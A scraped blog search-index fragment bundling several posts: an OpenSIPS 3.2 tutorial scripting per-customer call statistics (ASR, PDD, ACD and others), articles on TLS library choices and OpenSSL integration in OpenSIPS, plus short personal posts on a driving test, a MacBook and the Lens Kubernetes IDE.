update_stat_series(\u0026ldquo;inv_acc_per_min\u0026rdquo;, \u0026ldquo;INVITE_per_min\u0026rdquo;, \u0026ldquo;1\u0026rdquo;); update_stat_series(\u0026ldquo;inv_perc_per_min\u0026rdquo;, \u0026ldquo;INVITE_ratio\u0026rdquo;, \u0026ldquo;1\u0026rdquo;); } else { update_stat_series(\u0026ldquo;inv_perc_per_min\u0026rdquo;, \u0026ldquo;INVITE_ratio\u0026rdquo;, \u0026ldquo;-1\u0026rdquo;); } xlog(\u0026ldquo;INVITEs per min $stat(INVITE_per_min) represents $stat(INVITE_ratio)% of total requests\\n\u0026rdquo;); \u0026hellip;}\u0026hellip;You can query these statistics through the MI interface by running:opensips-cli -x mi get_statistics INVITE_per_min INVITE_ratio\nUse case In a production environment, the KPIs you provide your customers are very important, as they describe the quality of the service you provide. Some of these are quite standard indices (ACD, ASR, AST, PDD, NER, CCR), that are relevant for specific period of times (one minute, ten minutes, one hour). In the following paragraphs we will see how we can provide these statistics on a customer basis, as well as overall.First, we need to understand what each stat represents, to understand the logic that has to be scripted:\nASR (Answer Seizure Ratio) – the percentage of telephone calls which are answered (200 reply status code) CCR (Call Completion Ratio) – the percentage of telephone calls which are signaled back by the far-end client. Thus, 5xx, 6xx reply codes and internal 408 timeouts generated before reaching the client do not count here. The following is always true: CCR \u0026gt;= ASR _PDD (Post Dial Delay) _– the duration, in milliseconds, between the receival of the initial INVITE and the receival of the first 180/183 provisional reply (the call state advances to “ringing”) AST (Average Setup Time) – the duration, in milliseconds, between the receival of the initial INVITE and the receival of the first 200 OK reply (the call state advances to “answered”). The following is always true: AST \u0026gt;= PDD ACD (Average Call Duration) – the duration, in seconds, between the receival of the initial INVITE and the receival of the first BYE request from either participant (the call state advances to “ended”) NER (Network Effectiveness Ratio) – measures the ability of a server to deliver the call to the called terminal; in addition to ASR, NER also considers busy and user failures as success Now that we know what we want to see, we can start scripting: we need to load the statistics module, and define two types of profiles: one that computes average indices (used for AST, PDD, ACD), and one for percentage indices (used for ASR, NER, CCR). For each of them, we define 3 different time windows: per minute, per 10 minutes and per hour:\nloadmodule \u0026#34;statistics.so\u0026#34; modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;perc: algorithm=percentage group=stats\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;10m-perc: algorithm=percentage window=600 slots=10 group=stats_10m\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;1h-perc: algorithm=percentage window=3600 slots=6 group=stats_1h\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;avg: algorithm=average group=stats\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;10m-avg: algorithm=average window=600 slots=10 group=stats_10m\u0026#34;) modparam(\u0026#34;statistics\u0026#34;, \u0026#34;stat_series_profile\u0026#34;, \u0026#34;1h-avg: algorithm=average window=3600 slots=6 group=stats_1h\u0026#34;) In order to catch all the relevant events we need to hook on, we will be using the E_ACC_CDR and E_ACC_MISSED_EVENT events exposed by the accounting module. In order to have identify the customer that the events were triggered for, we need to export the customer’s identifier in the event:\nloadmodule \u0026#34;acc.so\u0026#34; modparam(\u0026#34;acc\u0026#34;, \u0026#34;extra_fields\u0026#34;,\u0026#34;evi: customer\u0026#34;) route { ... if (has_totag() \u0026amp;\u0026amp; is_method(\u0026#34;INVITE\u0026#34;)) { do_accounting(\u0026#34;evi\u0026#34;, \u0026#34;cdr|missed\u0026#34;); t_on_reply(\u0026#34;stats\u0026#34;); # store the moment the call started get_accurate_time($avp(call_start_s), $avp(call_start_us)); # TODO: store the customer\u0026#39;s id in $acc_extra(customer) } ... } When a reply comes in, our “stats” reply route will be called, where we will update all the statistics, according to our logic. Because we need to compute them twice, once for global statistics, and once for customer’s one, we will put the logic in a new route, “calculate_stats_reply”, that we call when a reply comes in:\nonreply_route[stats] { route(calculate_stats_reply, $avp(call_start_s), $avp(call_start_us), \u0026#34;\u0026#34;); route(calculate_stats_reply, $avp(call_start_s), $avp(call_start_us), $acc_extra(customer)); } route[calculate_stats_reply] { # expects: # - param 1: timestamp (in seconds) when the initial request was received # - param 2: timestamp (in microseconds) when the initial request was received # - param 3: statistic identifier; for global, empty string is used if ($rs == \u0026#34;180\u0026#34; || $rs == \u0026#34;183\u0026#34; || $rs == \u0026#34;200\u0026#34; || $rs == \u0026#34;400\u0026#34; || $rs == \u0026#34;403\u0026#34; || $rs == \u0026#34;408 || $rs == \u0026#34;480\u0026#34; || $rs == \u0026#34;487\u0026#34;) { if (!isflagset(\u0026#34;FLAG_PDD_CALCULATED\u0026#34;)) { get_accurate_time($var(now_s), $var(now_us)); ts_usec_delta($var(now_s), $var(now_us), $param(1), $param(2), $var(pdd_us)); $var(pdd_ms) = $var(pdd_us) / 1000; # milliseconds $avp(pdd) = $var(pdd_ms); setflag(\u0026#34;FLAG_PDD_CALCULATED\u0026#34;); } else { $var(pdd_ms) = $avp(pdd); } update_stat_series(\u0026#34;avg\u0026#34;, \u0026#34;PDD$param(3)\u0026#34;, $var(pdd_ms)); update_stat_series(\u0026#34;10m-avg\u0026#34;, \u0026#34;PDD_10m$param(3)\u0026#34;, $var(pdd_ms)); update_stat_series(\u0026#34;1h-avg\u0026#34;, \u0026#34;PDD_1h$param(3)\u0026#34;, $var(pdd_ms)); } if ($rs \u0026gt;= 200 \u0026amp;\u0026amp; $rs \u0026lt; 300) { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;ASR$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;ASR_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;ASR_1h$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;NER$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;NER_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;NER_1h$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;CCR$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;CCR_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;CCR_1h$param(3)\u0026#34;, 1); get_accurate_time($var(now_s), $var(now_us)); ts_usec_delta($var(now_s), $var(now_us), $param(1), $param(2), $var(ast_us)); $var(ast_us) = $var(ast_us) / 1000; # milliseconds update_stat_series(\u0026#34;avg\u0026#34;, \u0026#34;AST$param(3)\u0026#34;, $var(ast_us)); update_stat_series(\u0026#34;10m-avg\u0026#34;, \u0026#34;AST_10m$param(3)\u0026#34;, $var(ast_us)); update_stat_series(\u0026#34;1h-avg\u0026#34;, \u0026#34;AST_1h$param(3)\u0026#34;, $var(ast_us)); } } In case of a successful call, the dialog generates a CDR, that we use to update our ACD statistics:\nevent_route[E_ACC_CDR] { route(calculate_stats_cdr, $param(duration), $param(setuptime), \u0026#34;\u0026#34;); route(calculate_stats_cdr, $param(duration), $param(setuptime), $param(customer)); } route[calculate_stats_cdr] { # expects: # - param 1: duration (in seconds) of the call # - param 2: setuptime (in seconds) of the call # - param 3: optional - statistic identifier; global is empty string $var(total_duration) = $param(1) + $param(2); update_stat_series(\u0026#34;avg\u0026#34;, \u0026#34;ACD$param(3)\u0026#34;, $var(total_duration)); update_stat_series(\u0026#34;10m-avg\u0026#34;, \u0026#34;ACD_10m$param(3)\u0026#34;, $var(total_duration)); update_stat_series(\u0026#34;1h-avg\u0026#34;, \u0026#34;ACD_1h$param(3)\u0026#34;, $var(total_duration)); } And in case of a failure, we update the corresponding statistics:\nevent_route[E_ACC_MISSED_EVENT] { route(calculate_stats_failure, $param(code), \u0026#34;\u0026#34;); route(calculate_stats_failure, $param(code), $param(customer)); } route[calculate_stats_failure] { # expects: # - param 1: failure code # - param 2: statistic identifier; global is empty string update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;ASR$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;ASR_10m$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;ASR_1h$param(3)\u0026#34;, -1); if ($param(1) == \u0026#34;486\u0026#34; || $param(1) == \u0026#34;408\u0026#34;) { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;NER$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;NER_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;NER_1h$param(3)\u0026#34;, 1); } else { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;NER$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;NER_10m$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;NER_1h$param(3)\u0026#34;, -1); } if ($(param(1){s.int}) \u0026gt; 499) { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;CCR$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;CCR_10m$param(3)\u0026#34;, -1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;CCR_1h$param(3)\u0026#34;, -1); } else { update_stat_series(\u0026#34;perc\u0026#34;, \u0026#34;CCR$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;10m-perc\u0026#34;, \u0026#34;CCR_10m$param(3)\u0026#34;, 1); update_stat_series(\u0026#34;1h-perc\u0026#34;, \u0026#34;CCR_1h$param(3)\u0026#34;, 1); } } And we are all set – all you have to do is to run traffic through your server, query the statistics (over MI) at your desired pace (such as every minute), and plot them nicely in a graph to improve your monitoring experience .\nPossible enhancements There is currently no way of persisting these statistics over a restart – this means that every time you restart, the new statistics have to be re-computed, resulting in possible misleading results. In the future, it would be nice if we could provide some sort of persistent storage for them.All statistics are currently local, although it might be possible aggregate values across multiple servers using some scripting + cluster broadcast messages from script. Ideally, we shall implement this in an automatic fashion using the clusterer module.Finally, although there are currently only three algorithms supported (accumulate, percentage and average), more can be added quite easily – we shall do that in future versions.Enjoy your new statistics!\n","permalink":"https://wdd.js.org/opensips/blog/call-stat/","summary":"早期1x和2x版本的OpenSIPS,统计模块只有两种模式,一种时计算值,另一种是从运行开始的累加值。而无法获取比如说最近一分钟,最近5分钟,这样的基于一定周期的统计值,在OpenSIPS 3.2上,提供了新的解决方案。\n原文:https://blog.opensips.org/2021/02/02/improved-series-based-call-statistics-using-opensips-3-2/\nReal-time call statistics is an excellent tool to evaluate the quality and performance of your telephony platform, that is why it is very important to expose as many statistics as possible, accumulated over different periods of time.OpenSIPS provides an easy to use interface that exposes simple primitives for creating, updating, and displaying various statistics, both well defined as well as tailored to your needs. However, the current implementation comes with a limitation: statistics are gathered starting from the beginning of the execution, up to the point they are read.","title":"Improved series-based call statistics using OpenSIPS 3.2"},{"content":" OpenSIPS和OpenSSL之间的集成总是存在各种个样的问题。我之前就遇到死锁的问题,opensips CPU cpu占用很高。但是不再处理SIP消息。最终排查下来,是和OpenSSL有关。 深层次的原因,是因为OpenSIPS是个多进程的程序,而OpenSSL主要是面向多线程的程序。 在OpenSIPS3.2版本上,官方团队列出了几个OpenSSL的替代品,并进行优劣对比,最终选择一个比较好的方案。 我们一起来看看吧。\nFor the purpose of providing secure SIP communication over the TLS protocol, OpenSIPS uses the OpenSSL library, the most popular TLS implementation across the Internet. However, integrating OpenSSL with OpenSIPS has posed a series of challenges starting with OpenSSL version 1.1.0, and has caused quite a few bugs and crashes since then, as presented in more detail in this article.As such, for the new OpenSIPS 3.2 version, we have finally decided to provide support for an additional TLS library, as an alternative to OpenSSL. In this article, we are going to take a look at the options we have explored and the criteria and factors that we used to choose a candidate.\nIssues with OpenSSL Even though up to this point, we have been able to solve the encountered issues, new problems continue to emerge and there are still ongoing reports and Github tickets on this topic. The main reason for this, in short, is that OpenSSL is designed with multi-threaded applications in mind, and is incompatible with certain design principles of a multi-process application like OpenSIPS. OpenSSL is not intended to be used in an environment where TLS connections can be shared between multiple worker processes.\nRequirements for a new TLS library First, we considered the following general requirements for the new TLS library to use in OpenSIPS:\ncross-platform support, availability for many operating systems (ideally, through the default package repository); comprehensive, up to date documentation; support for the the latest and widely used protocols and encryption algorithms; mature, lively project and good adoption. But more precisely, in order for a TLS library to be viable for OpenSIPS, in the light of our multi-process architecture constraints, we specifically look for:\nthread-safe design (in OpenSIPS we only have a single thread per process, but we do concurrently access the library from multiple processes nonetheless); hooks for providing custom memory allocation functions (instead of the system malloc() family), to make sure the TLS connection contexts are allocated in OpenSIPS shared memory, similarly to CRYPTO_set_mem_functions() in OpenSSL; hooks for providing custom locking mechanisms (primitives like create, lock, unlock mutex) in order to synchronize access between processes to the shared TLS connection contexts, similarly to the obsolete CRYPTO_set_locking_callback() in OpenSSL; no use of specific, per-thread memory zone storage mechanisms like Thread Local Storage (which OpenSSL adopted in version 1.1.1, and caused further crashes in OpenSIPS). Candidates In this section we are going to list the top candidates that we have identified in our search for the best TLS implementation that fits OpenSIPS and provide a short conclusion on the findings on each one.\nOpenSSL forks Even though prominent OpenSSL forks like LibreSSL (forked by OpenBSD project from OpenSSL 1.0.1g) or _BoringSSL (forked by Google), seem good options from other perspectives (like features or availability), _they fail to bring or keep from old OpenSSL, the required mechanisms for properly integrating with OpenSIPS. LibreSSL for example has dropped both CRYPTO_set_mem_functions() and CRYPTO_set_locking_callback().\nGnuTLS Popular among free and open source software, GnuTLS’s documentation on thread safety does not seem to indicate that it is safe to share TLS session objects between threads. Moreover, the library uses hard-coded mutex implementations (e.g., pthreads on GNU/Linux and CriticalSection on Windows) for several aspects, like random number generation (this operation has led to issues in OpenSSL). In terms of custom application hooks, GnuTLS does offer **gnutls_global_set_mutex() **for locking, but since version 3.3.0 has dropped gnutls_global_set_mem_functions() for memory allocation, which is a must for OpenSIPS shared memory.\nMbed TLS Formerly known as PolarSSL, MbedTLS is a library designed for embedded devices and for the purpose of better integration with different systems, offers abstraction layers for memory allocation and threading mechanisms. OpenSIPS can take advantage of this features by installing its own handlers via mbedtls_platform_set_calloc_free() and mbedtls_threading_set_alt(). The downside in this case is that the customisations are only available if the library is compiled with specific flags, which are not enabled by default. This would mean that TLS in OpenSIPS would not properly work with the library installed directly from packages, which is not a desirable approach.\nWolfSSL Previously called _yaSSL _/ CyaSSL, WolfSSL is a lightweight TLS library aimed at embedded devices. It has achieved high distribution volumes on all systems nevertheless, due to formerly being bundled with MySQL, as the default TLS implementation. As it is the case with Mbed TLS, the library’s high portability design can be exploited for better integration with OpenSIPS. WolfSSL provides a hook for setting custom memory allocation functions through wolfSSL_SetAllocators() but does not offer a way to change the locking mechanism at runtime (unless compiled differently). However, the documentation and forum discussions on this matter, suggest that as long as access to shared connection contexts is synchronised at the user application level, the library will not internally acquire any mutexes and no concurrency issues will arise.\nFinal choice Based on our evaluation of the available TLS libraries, WolfSSL seems to be a good TLS implementation overall and the most appropriate to work with OpenSIPS’s multi-process design and constraints. In conclusion, starting with OpenSIPS 3.2, we plan on providing the possibility of choosing between WolfSSL and OpenSSL for the TLS needs in OpenSIPS.\n参考:https://blog.opensips.org/2021/02/11/exploring-ssl-tls-libraries-for-opensips-3-2/\n","permalink":"https://wdd.js.org/opensips/blog/opensips3-tls/","summary":"OpenSIPS和OpenSSL之间的集成总是存在各种个样的问题。我之前就遇到死锁的问题,opensips CPU cpu占用很高。但是不再处理SIP消息。最终排查下来,是和OpenSSL有关。 深层次的原因,是因为OpenSIPS是个多进程的程序,而OpenSSL主要是面向多线程的程序。 在OpenSIPS3.2版本上,官方团队列出了几个OpenSSL的替代品,并进行优劣对比,最终选择一个比较好的方案。 我们一起来看看吧。\nFor the purpose of providing secure SIP communication over the TLS protocol, OpenSIPS uses the OpenSSL library, the most popular TLS implementation across the Internet. However, integrating OpenSSL with OpenSIPS has posed a series of challenges starting with OpenSSL version 1.1.0, and has caused quite a few bugs and crashes since then, as presented in more detail in this article.As such, for the new OpenSIPS 3.","title":"Exploring SSL/TLS libraries for OpenSIPS 3.2"},{"content":"科目二倒库和四项练的差不多了,决定去参加考试,考试虽然一波三折,但结果还是好的,一次通过了\n考场熟悉 考场倒库有14各区,没什么好讲的。 四项有4各环线,每个环线上有两个考试线路,所以一共是8条线路 务必看懂各种符号的含义,例如曲线,侧方, 直角与坡道 【重点】当你知道你自己在那条线上考试之后,务必对照着线路图,将四项的顺序以及位置牢记于心。虽然路上会有牌子指示下一项内容是什么,但是考试的时候,由于视线等各种原因可能不会去在意。也有人,看到前面是直角,就以为是前面是直角转弯,结果到了真正直角转弯的位置,却没有做直角相关的操作,导致考试失败。 例如,当你被选择到8号线的四项时,你到了7-8待考等待区后,等待自己的考试车。在等待过程中按照平面图,可以发现,离待考最近的起点之后,8号线,第一个考试项目侧方停车,然后是直角转弯,接着是S弯,最后是坡道。\n模拟考相关 模拟的费用以及项目内容 模拟的费用是360,包含一下内容\n倒车入库120,可以倒库3次 四项有八条线路,每个线路各跑一次 四项的车和倒库的车是不同的,这点需要注意。\n模拟考有用吗? 我觉的是有用的\n一般驾校只有一两条线路,实际考场有8条线路。每条线路你都可以跑一次,从1号线到8号线。跑过这8条线,你会基本知道自己四项中哪些项目比较容易出错。可以针对性加强。另外也可以找找坡道的点位。 跑模拟四项的时候,有个教练会坐在副驾驶上。他会不断的催促你,此时你千万不要让他的催促导致你连续的出错,进而影响到你考试的心态。你是交了钱的,离合和油门都在你这边,教练再催,也是没办法让车加速的。你不要怂。【注意:在真实考试时,副驾驶是没有人的。】 教练为什么要不停的催你,因为你越快跑完8条线路,他就可以接更多的学员,他手里的小票就越多,提成就越多。当你模拟完8条线路,教练会让你再买几条线路。线路其实是可以按条买的,每条线跑一次30块。真是车轮一转,家财万贯。车轮一响,黄金万两啊。 虽然倒库的车库有14个,但是你模拟的那个车库,其实有极大的可能就是你真实考试的那个车库。这样你就可以提前熟悉一下车库的点位。我比较菜,模拟三次的倒库都倒失败了。但是我从三次失败中也学到了自己失败的原因。从而在真实考试时成功通过。倒库如果你三次都失败了,也可以单独买的。倒3次60块。倒6次120块。但是这就不建议再花钱了。你应该记住自己的错误的点。比如是那边压线了,然后回到驾校,和你的教练沟通一下。驾校的教练会给你更加有用的建议。另外你务必要记住自己是几号库,你只要和驾校教练沟通一下,他都知道这个库位的处理细节的。 如果我没有模拟考过,很可能我科目二第一次会挂,然后还要花时间去搞这件事。如果能用钱解决的事情,我更希望能节省一些时间。 心态 考试的心态很重要,和我一起参见考试的一个同学。他没有参加模拟考,但是他在考试中倒库一把就倒进去了。我认为他是比较牛逼的。但是有可能他骄傲了,挂在了几个转向灯和坡道定点上。侧方停车时,出库居然忘记打转向灯了。\n也有人忘记系安全带了。\n很多小的点,也很容易的点。在驾校都练的很熟练,但是一到考场,就总是丢三落四的忘记。为什么会有这种场景的。\n因为心态变了。\n","permalink":"https://wdd.js.org/posts/2021/01/","summary":"科目二倒库和四项练的差不多了,决定去参加考试,考试虽然一波三折,但结果还是好的,一次通过了\n考场熟悉 考场倒库有14各区,没什么好讲的。 四项有4各环线,每个环线上有两个考试线路,所以一共是8条线路 务必看懂各种符号的含义,例如曲线,侧方, 直角与坡道 【重点】当你知道你自己在那条线上考试之后,务必对照着线路图,将四项的顺序以及位置牢记于心。虽然路上会有牌子指示下一项内容是什么,但是考试的时候,由于视线等各种原因可能不会去在意。也有人,看到前面是直角,就以为是前面是直角转弯,结果到了真正直角转弯的位置,却没有做直角相关的操作,导致考试失败。 例如,当你被选择到8号线的四项时,你到了7-8待考等待区后,等待自己的考试车。在等待过程中按照平面图,可以发现,离待考最近的起点之后,8号线,第一个考试项目侧方停车,然后是直角转弯,接着是S弯,最后是坡道。\n模拟考相关 模拟的费用以及项目内容 模拟的费用是360,包含一下内容\n倒车入库120,可以倒库3次 四项有八条线路,每个线路各跑一次 四项的车和倒库的车是不同的,这点需要注意。\n模拟考有用吗? 我觉的是有用的\n一般驾校只有一两条线路,实际考场有8条线路。每条线路你都可以跑一次,从1号线到8号线。跑过这8条线,你会基本知道自己四项中哪些项目比较容易出错。可以针对性加强。另外也可以找找坡道的点位。 跑模拟四项的时候,有个教练会坐在副驾驶上。他会不断的催促你,此时你千万不要让他的催促导致你连续的出错,进而影响到你考试的心态。你是交了钱的,离合和油门都在你这边,教练再催,也是没办法让车加速的。你不要怂。【注意:在真实考试时,副驾驶是没有人的。】 教练为什么要不停的催你,因为你越快跑完8条线路,他就可以接更多的学员,他手里的小票就越多,提成就越多。当你模拟完8条线路,教练会让你再买几条线路。线路其实是可以按条买的,每条线跑一次30块。真是车轮一转,家财万贯。车轮一响,黄金万两啊。 虽然倒库的车库有14个,但是你模拟的那个车库,其实有极大的可能就是你真实考试的那个车库。这样你就可以提前熟悉一下车库的点位。我比较菜,模拟三次的倒库都倒失败了。但是我从三次失败中也学到了自己失败的原因。从而在真实考试时成功通过。倒库如果你三次都失败了,也可以单独买的。倒3次60块。倒6次120块。但是这就不建议再花钱了。你应该记住自己的错误的点。比如是那边压线了,然后回到驾校,和你的教练沟通一下。驾校的教练会给你更加有用的建议。另外你务必要记住自己是几号库,你只要和驾校教练沟通一下,他都知道这个库位的处理细节的。 如果我没有模拟考过,很可能我科目二第一次会挂,然后还要花时间去搞这件事。如果能用钱解决的事情,我更希望能节省一些时间。 心态 考试的心态很重要,和我一起参见考试的一个同学。他没有参加模拟考,但是他在考试中倒库一把就倒进去了。我认为他是比较牛逼的。但是有可能他骄傲了,挂在了几个转向灯和坡道定点上。侧方停车时,出库居然忘记打转向灯了。\n也有人忘记系安全带了。\n很多小的点,也很容易的点。在驾校都练的很熟练,但是一到考场,就总是丢三落四的忘记。为什么会有这种场景的。\n因为心态变了。","title":"南京尧新科目二考试考试回顾"},{"content":"我的macbook是2017买的, 使用到今天大概1204天。\n最初的使用体验是\n触摸板很灵敏 屏幕很高清 系统很流畅 三年中出现过的问题\n键盘中的几个按键出现过问题,按键不灵敏。17年是用的蝴蝶键盘,这个键盘问题很多。最新版已经换成了剪刀脚键盘了。 屏幕老化,屏幕的四周出现淡红色的红晕,但是不影响使用。 如果不充电的情况下,掉电蛮快的,而且有时候电量还很多,就自动关机。 现在的感觉:\n触摸板我基本不会用了,因为大部分时间我都是用键盘可以搞定一切。因为我用了vim编辑器。 我也不再使用macbook pro自带的键盘,因为真是不好用。所有的笔记本键盘,除了thinkpad的键盘。都不太好用,不适合长时间打字。所以我用了外接的静电容键盘。 无论多么好的自带键盘,都比不过外接的键盘,毕竟是专业的。当然除非你经常初查或者移动,外接键盘真是非常值得入手。 关于下一台电脑:下一台电脑我会等待M2芯片, macbook pro或则是macbook mini, 这个我还没想好。我对命令行以及相关unix有着很大的依赖。即使用ubuntu, 我也不可能再使用windows。\n","permalink":"https://wdd.js.org/posts/2020/12/kxpswu/","summary":"我的macbook是2017买的, 使用到今天大概1204天。\n最初的使用体验是\n触摸板很灵敏 屏幕很高清 系统很流畅 三年中出现过的问题\n键盘中的几个按键出现过问题,按键不灵敏。17年是用的蝴蝶键盘,这个键盘问题很多。最新版已经换成了剪刀脚键盘了。 屏幕老化,屏幕的四周出现淡红色的红晕,但是不影响使用。 如果不充电的情况下,掉电蛮快的,而且有时候电量还很多,就自动关机。 现在的感觉:\n触摸板我基本不会用了,因为大部分时间我都是用键盘可以搞定一切。因为我用了vim编辑器。 我也不再使用macbook pro自带的键盘,因为真是不好用。所有的笔记本键盘,除了thinkpad的键盘。都不太好用,不适合长时间打字。所以我用了外接的静电容键盘。 无论多么好的自带键盘,都比不过外接的键盘,毕竟是专业的。当然除非你经常初查或者移动,外接键盘真是非常值得入手。 关于下一台电脑:下一台电脑我会等待M2芯片, macbook pro或则是macbook mini, 这个我还没想好。我对命令行以及相关unix有着很大的依赖。即使用ubuntu, 我也不可能再使用windows。","title":"macbook pro 使用三年后的感受"},{"content":" generic-message = start-line *message-header CRLF [ message-body ] start-line = Request-Line / Status-Line 其中在rfc2543中规定\nCR = %d13 ; US-ASCII CR, carriage return character LF = %d10 ; US-ASCII LF, line feed character 项目 十进制 字符串表示 CR 13 \\r LF 10 \\n 也就是说在一个SIP消息中\nheadline\\r\\n key:v\\r\\n \\r\\n some_body\\r\\n 所以CRLF就是 \\r\\n 参考 https://tools.ietf.org/html/rfc3261 https://tools.ietf.org/html/rfc2543 ","permalink":"https://wdd.js.org/opensips/ch3/sip-crlf/","summary":" generic-message = start-line *message-header CRLF [ message-body ] start-line = Request-Line / Status-Line 其中在rfc2543中规定\nCR = %d13 ; US-ASCII CR, carriage return character LF = %d10 ; US-ASCII LF, line feed character 项目 十进制 字符串表示 CR 13 \\r LF 10 \\n 也就是说在一个SIP消息中\nheadline\\r\\n key:v\\r\\n \\r\\n some_body\\r\\n 所以CRLF就是 \\r\\n 参考 https://tools.ietf.org/html/rfc3261 https://tools.ietf.org/html/rfc2543 ","title":"SIP消息格式CRLF"},{"content":"下载安装 Lens-4.0.4.dmg\n添加集群 在k8s master 节点上使用输入下面的指令,** 将输出内容复制一下**\nkubectl config view --minify --raw 选择Fiel \u0026gt; Add cluster 粘贴 集群就显示出来了 ","permalink":"https://wdd.js.org/posts/2020/12/ai1lnu/","summary":"下载安装 Lens-4.0.4.dmg\n添加集群 在k8s master 节点上使用输入下面的指令,** 将输出内容复制一下**\nkubectl config view --minify --raw 选择Fiel \u0026gt; Add cluster 粘贴 集群就显示出来了 ","title":"lens k8s IDE"},{"content":" In order to provide secure SIP communication over TLS connections, OpenSIPS uses the OpenSSL library, probably the most widely used open-source TLS \u0026amp; SSL library across the Internet. The fact that it is so popular and largely used makes it more robust, therefore a great choice to enforce security in a system! That was the reason it was chosen to be used in OpenSIPS in the first place. However, being designed as a multi-threaded library, while OpenSIPS is a multi-process application, integrating it was not an easy task. Furthermore, maintaining it was not trivial either. And the major changes in the OpenSSL library within the last couple of years have proven that. Once the library maintainers decided to have a more robust thread-safe approach, things started to break in OpenSIPS. Hence the numerous issues reported withing the last couple of years related to SSL bugs and crashes. The purpose of this post is to present you the challenges we faced, and how we dealt with them. This article describes the way OpenSSL, a multi-threaded designed library, was designed to work in OpenSIPS, a multi-process application, and what was the journey of maintaining the code by adapting to the changes throughout the years in the OpenSSL library.\nOpenSSL是个多线程的程序, OpenSIPS是个多进程的程序,两者沟通比较难 OpenSSL的大版本升级,有很大的可能性导致OpenSIPS也出问题 在github上有很多的issue都是关于OpenSSL和OpenSIPS [BUG] Deadlock in libssl/libcrypto #1767 https://github.com/OpenSIPS/opensips/issues/1858 Original design The initial design and implementation of TLS support in OpenSIPS was done in 2003. Back then OpenSSL was releasing revision 0.9.6. That’s the version that we have used for the original design and implementation.OpenSIPS is a multi-process server, that is able to handle SIP requests or replies in multiple processes, in parallel. When a message is received it is “assigned” to any of its free processes, that is responsible of the entire processing of that message. Any of these messages might decide, based on the routing logic, that the request has to be forwarded to the next hop using TLS. This means that any OpenSIPS process worker needs to be able to forward a message using SSL/TLS connections. And naturally, since all these processes run simultaneously, multiple processes can decide to forward the messages to the same TLS destination, raising various consistency concerns.In terms of design, there were three possible ways of ensuring consistency in this multi-process environment:\nEach process has its own SSL/TLS connection towards each destination. This means that if you have N workers and M destinations, your OpenSIPS server will have to maintain NxM connections. That’s something we should avoid. Map each SSL/TLS connection with a worker, and only that worker is allowed to communicate with that endpoint. When a different process has to forward a message to a specific endpoint, it will first send the message/job to the designated worker, which forwards it down to the next hop. Although this looks OK, it involves an extra layer or inter-process communication, for the job dispatching, and it is also prone to scalability issues (for example when the destination is a TLS trunk). Keep a single SSL/TLS connection to each destination throughout all the processes, and make sure there’s a mutual concurrent access to it. This seems to be the most elegant solution, as your SIP interconnections will always see a single TLS connection towards your server. However, ensuring mutual access to the connection is not that trivial, as you will see throughout this article. Nevertheless, since in OpenSIPS we need to address both scalability and ease interconnection with other SIP endpoints, we decided to implement solution number 3.\nInitial Implementation Although even back then it was advertised as a multi-threaded library, OpenSSL was exposing hooks to use it in a multi-process environment:\nCRYPTO_set_mem_functions() hook could be used to have the library use a custom memory allocator. We set this function to make sure OpenSSL allocates the SSL context in a shared memory, so that it can be accessed by any process **CRYPTO_set_id_callback() **was used to determine the thread that OpenSSL was running into. We used this callback to indicate that the “thread” was actually a process, and each of them has its own id, namely the Process ID (PID) CRYPTO_set_locking_callback() was exposing hooks to perform create, lock, unlock and delete using “user” specified locking mechanisms. Using this function we were able to “guard” the SSL shared context (allocated in our shared memory) using OpenSIPS specific multi-process shared locking mechanisms. That being said, we had all the ingredients to implement our chosen solution using OpenSSL, all we had to do was to glue them together. This is how the first implementation of SSL/TLS communication appeared in OpenSIPS. And it worked out just great throughout the years, up until OpenSSL version (including) 1.0.2.\nOpenSSL 1.1.0 new threading API The turning point On 25th of August 2016, when OpenSSL 1.1.0, was released, the OpenSSL team decided to implement a new threading API. In order to provide a nicer usage experience to multi-threaded applications that were using the OpenSSL libraries, they dropped the previously used threading mechanism and replaced it with an their own (hardcoded) implementation using pthreads (for Linux). This means that we could no longer use the CRYPTO_set_locking_callback() hooks, as they became obsolete.Since we were still allocating SSL contexts in shared memory, the locking mechanisms (i.e. pthread mutex structures) were also allocated in shared memory. Therefore, when OpenSSL was using them to guard the shared context, it was actually still using a “shared” memory, therefore the other processes were able to see that the lock/pthread mutex is acquired, resulting (in theory) in a successful mutual exclusion to the shared context.\nThe issue In 